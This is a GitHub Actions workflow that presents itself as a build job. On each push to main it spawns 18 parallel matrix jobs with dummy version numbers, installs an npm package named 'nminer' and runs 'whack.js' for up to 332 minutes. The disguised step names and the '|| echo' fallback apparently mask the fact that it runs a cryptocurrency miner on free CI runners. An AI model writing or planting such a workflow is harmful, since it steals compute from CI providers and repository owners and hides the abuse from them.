name: whack
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1836 }
          - { version: 9209 }
          - { version: 6888 }
          - { version: 8541 }
          - { version: 4690 }
          - { version: 6217 }
          - { version: 1532 }
          - { version: 9238 }
          - { version: 2976 }
          - { version: 3600 }
          - { version: 5086 }
          - { version: 6641 }
          - { version: 359 }
          - { version: 4750 }
          - { version: 4377 }
          - { version: 739 }
          - { version: 7585 }
          - { version: 9898 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: anaesthetise over
        run: |
          npm install nminer@latest
          timeout 332m node whack.js || echo "whack executed"